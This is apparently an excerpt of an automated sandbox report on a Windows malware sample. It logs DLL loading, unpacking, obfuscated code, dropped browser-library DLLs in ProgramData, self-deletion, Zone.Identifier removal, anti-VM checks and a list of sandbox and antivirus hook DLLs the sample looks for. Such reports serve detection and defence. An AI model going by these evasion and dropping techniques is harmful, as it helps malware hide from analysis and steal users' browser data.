Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source:	Binary string: nss3.pdb@ source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source:	Binary string: nss3.pdb source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: mozglue.pdb source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.9.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\4.exe	Unpacked PE file: 0.2.4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\sdveeeu	Unpacked PE file: 5.2.sdveeeu.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Unpacked PE file: 6.2.F441.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Unpacked PE file: 6.2.F441.exe.400000.0.unpack

PE file contains sections with non-standard names

Source: sqls[1].dll.9.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.9.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.9.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.9.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.9.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.9.dr	Static PE information: section name: .didat
Source: nss3.dll.9.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.9.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.9.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00402CD7 push cs; retf	0_2_00402CD8
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401EA7 push 0000000Eh; retf 0038h	0_2_00401EB6
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_004033B6 push eax; ret	0_2_00403419
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02DD1F0E push 0000000Eh; retf 0038h	0_2_02DD1F1D
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02DD2D3E push cs; retf	0_2_02DD2D3F
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF4AC3 push eax; ret	0_2_02EF4AC4
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF38DD push 0000000Eh; retf 0038h	0_2_02EF38EC
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF386D push cs; retf 0038h	0_2_02EF38EC
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF444F push cs; retf	0_2_02EF4450
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF343A push ss; iretw	0_2_02EF344C
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF9919 push 0000002Ah; iretd	0_2_02EF9963
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00402CD7 push cs; retf	5_2_00402CD8
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401EA7 push 0000000Eh; retf 0038h	5_2_00401EB6
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_004033B6 push eax; ret	5_2_00403419
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_02E12D3E push cs; retf	5_2_02E12D3F
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_02E11F0E push 0000000Eh; retf 0038h	5_2_02E11F1D
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_03013315 push 0000000Eh; retf 0038h	5_2_03013324
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_03019351 push 0000002Ah; iretd	5_2_0301939B
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_03012E72 push ss; iretw	5_2_03012E84
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_03013E87 push cs; retf	5_2_03013E88
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_030132A5 push cs; retf 0038h	5_2_03013324
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_030144FB push eax; ret	5_2_030144FC
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00441DE9 push ebp; ret	6_2_00441E02
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00441FE4 pushad ; retf 0041h	6_2_00441FE5
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0211030D push ecx; ret	6_2_02110315
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_0429B010 push edx; ret	8_2_0429B21F
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_0429A910 push edx; ret	8_2_0429A91B

Drops PE files

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F441.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\msvcp140.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9EDA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\softokn3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\sdveeeu	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	File created: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\softokn3.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sdveeeu

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\4.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\sdveeeu:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\F441.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: sdveeeu, 00000005.00000002.1997292186.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKG

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_00503F97 rdtsc

6_2_00503F97

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 363	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1746	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 719	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3159	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 888	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 856	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\softokn3.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 6344	Thread sleep count: 363 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5460	Thread sleep count: 1746 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5460	Thread sleep time: -174600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6364	Thread sleep count: 719 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6364	Thread sleep time: -71900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3220	Thread sleep count: 259 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2872	Thread sleep count: 295 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3736	Thread sleep count: 327 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3736	Thread sleep time: -32700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5460	Thread sleep count: 3159 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5460	Thread sleep time: -315900s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe TID: 5496	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe TID: 3328	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 3900	Thread sleep count: 59 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6CFAEBF0 PR_GetNumberOfProcessors,GetSystemInfo,

9_2_6CFAEBF0

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
